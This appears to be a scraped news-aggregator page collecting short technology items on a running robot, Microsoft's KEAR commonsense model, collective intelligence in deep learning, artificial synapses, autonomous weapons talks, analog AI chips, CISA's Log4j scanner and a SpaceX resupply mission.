Toggle light / dark theme

Agility Robotics’ Cassie just became the first bipedal robot to complete an outdoor 5K run, completing the jaunt on a single charge.


Agility Robotics’ Cassie just became the first bipedal robot to complete an outdoor 5K run — and it did so untethered and on a single charge.

The challenge: To create robots that can seamlessly integrate into our world, it makes sense to design those robots to walk like we do. That should make it easier for them to navigate our homes and workplaces.

KEAR (Knowledgeable External Attention for commonsense Reasoning) —along with recent milestones in computer vision and neural text-to-speech —is part of a larger Azure AI mission to provide relevant, meaningful AI solutions and services that work better for people because they better capture how people learn and work—with improved vision, knowledge understanding, and speech capabilities. At the center of these efforts is XYZ-code, a joint representation of three cognitive attributes: monolingual text (X), audio or visual sensory signals (Y), and multilingual (Z). For more information about these efforts, read the XYZ-code blog post.

Last month, our Azure Cognitive Services team, comprising researchers and engineers with expertise in AI, achieved a groundbreaking milestone by advancing commonsense language understanding. When given a question that requires drawing on prior knowledge and five answer choices, our latest model— KEAR, Knowledgeable External Attention for commonsense Reasoning —performs better than people answering the same question, calculated as the majority vote among five individuals. KEAR reaches an accuracy of 89.4 percent on the CommonsenseQA leaderboard compared with 88.9 percent human accuracy. While the CommonsenseQA benchmark is in English, we follow a similar technique for multilingual commonsense reasoning and topped the X-CSR leaderboard.

Although recent large deep learning models trained with big data have made significant breakthroughs in natural language understanding, they still struggle with commonsense knowledge about the world, information that we, as people, have gathered in our day-to-day lives over time. Commonsense knowledge is often absent from task input but is crucial for language understanding. For example, take the question “What is a treat that your dog will enjoy?” To select an answer from the choices salad, petted, affection, bone, and lots of attention, we need to know that dogs generally enjoy food such as bones for a treat. Thus, the best answer would be “bone.” Without this external knowledge, even large-scale models may generate incorrect answers. For example, the DeBERTa language model selects “lots of attention,” which is not as good an answer as “bone.”

The contemporaneous development in recent years of deep neural networks, hardware accelerators with large memory capacity and massive training datasets has advanced the state-of-the-art on tasks in fields such as computer vision and natural language processing. Today’s deep learning (DL) systems however remain prone to issues such as poor robustness, inability to adapt to novel task settings, and requiring rigid and inflexible configuration assumptions. This has led researchers to explore the incorporation of ideas from collective intelligence observed in complex systems into DL methods to produce models that are more robust and adaptable and have less rigid environmental assumptions.

In the new paper Collective Intelligence for Deep Learning: A Survey of Recent Developments, a Google Brain research team surveys historical and recent neural network research on complex systems and the incorporation of collective intelligence principles to advance the capabilities of deep neural networks.

Collective intelligence can manifest in complex systems as self-organization, emergent behaviours, swarm optimization, and cellular systems; and such self-organizing behaviours can also naturally arise in artificial neural networks. The paper identifies and explores four DL areas that show close connections with collective intelligence: image processing, deep reinforcement learning, multi-agent learning, and meta-learning.

A research team, led by Assistant Professor Desmond Loke from the Singapore University of Technology and Design (SUTD), has developed a new type of artificial synapse based on two-dimensional (2D) materials for highly scalable brain-inspired computing.

Brain-inspired computing, which mimics how the human brain functions, has drawn significant scientific attention because of its uses in artificial intelligence functions and low energy consumption. For brain-inspired computing to work, synapses remembering the connections between two neurons are necessary, like .

In developing brains, synapses can be grouped into functional synapses and silent synapses. For functional synapses, the synapses are active, while for silent synapses, the synapses are inactive under normal conditions. And, when silent synapses are activated, they can help to optimize the connections between neurons. However, as artificial synapses built on typically occupy large spaces, there are usually limitations in terms of hardware efficiency and costs. As the human brain contains about a hundred trillion synapses, it is necessary to improve the hardware cost in order to apply it to smart portable devices and internet-of things (IoTs).

Autonomous weapon systems—commonly known as killer robots—may have killed human beings for the first time ever last year, according to a recent United Nations Security Council report on the Libyan civil war. History could well identify this as the starting point of the next major arms race, one that has the potential to be humanity’s final one.

The United Nations Convention on Certain Conventional Weapons debated the question of banning at its once-every-five-years review meeting in Geneva Dec. 13–17, 2021, but didn’t reach consensus on a ban. Established in 1983, the convention has been updated regularly to restrict some of the world’s cruelest conventional weapons, including land mines, booby traps and incendiary weapons.

Autonomous weapon systems are robots with lethal weapons that can operate independently, selecting and attacking targets without a human weighing in on those decisions. Militaries around the world are investing heavily in autonomous weapons research and development. The U.S. alone budgeted US$18 billion for autonomous weapons between 2016 and 2020.

Some of the best circuits to drive AI in the future may be analog, not digital, and research teams around the world are increasingly developing new devices to support such analog AI.

The most basic computation in the deep neural networks driving the current explosion in AI is the multiply-accumulate (MAC) operation. Deep neural networks are composed of layers of artificial neurons, and in MAC operations, the output of each one of these layers is multiplied by the values of the strengths or “weights” of their connections to the next layer, which then sums up these contributions.

Modern computers have digital components devoted to MAC operations, but analog circuits theoretically can perform these computations for orders of magnitude less energy. This strategy—known as analog AI, compute-in-memory or processing-in-memory—often performs these multiply-accumulate operations using non-volatile memory devices such as flash, magnetoresistive RAM (MRAM), resistive RAM (RRAM), phase-change memory (PCM) and even more esoteric technologies.

The Cybersecurity and Infrastructure Security Agency (CISA) has announced the release of a scanner for identifying web services impacted by two Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021–44228 and CVE-2021–45046.

“log4j-scanner is a project derived from other members of the open-source community by CISA’s Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities,” the cybersecurity agency explains.

This scanning solution builds upon similar tools, including an automated scanning framework for the CVE-2021–44228 bug (dubbed& Log4Shell)& developed by cybersecurity company FullHunt.

A turkey dinner and presents arrived in time for the holidays.


CAPE CANAVERAL, Fla. — A SpaceX Dragon capsule arrived at the International Space Station early Wednesday (Dec. 22), carrying with it a holiday haul of science gear and Christmas treats for the astronauts living on the orbital outpost.

The autonomous Dragon resupply ship docked itself at the orbital outpost at 3:41 a.m. EST (0841 GMT), ahead of its planned 4:30 a.m. docking time. It parked itself at the space-facing port on the station’s Harmony module, with NASA astronauts Raja Chari and Tom Marshburn monitoring the docking from inside the station.

This is an interesting rant about how Google, who owns YouTube, refuses to provide basic tools to stop scammers from stealing everyone’s money. The reason this is important is it shows how there is going to be virtually NO ONE trying to stop someone from creating an unfriendly AGI or a nanoweapon, etc. Maybe on the one thousandth nanoweapon they would do something, assuming there are any survivors from the first 999 such weapons…

Governments/organizations are very slow to respond to problems.


Get your JayzTwoCents Merch Here! — https://www.jayztwocents.com.